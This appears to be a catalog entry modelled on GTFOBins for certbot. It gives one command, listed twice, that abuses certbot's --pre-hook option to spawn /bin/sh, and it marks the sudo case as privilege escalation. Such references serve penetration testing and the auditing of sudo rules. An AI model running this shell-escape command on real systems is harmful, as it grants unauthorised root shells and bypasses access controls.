Catalog GTFOBins

GTFO · Tool

certbot

2 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux

This needs a writable directory, replace `.` if needed.

certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux

This needs a writable directory, replace `.` if needed.

certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'
Context
unprivileged
Native
shell
MITRE
T1059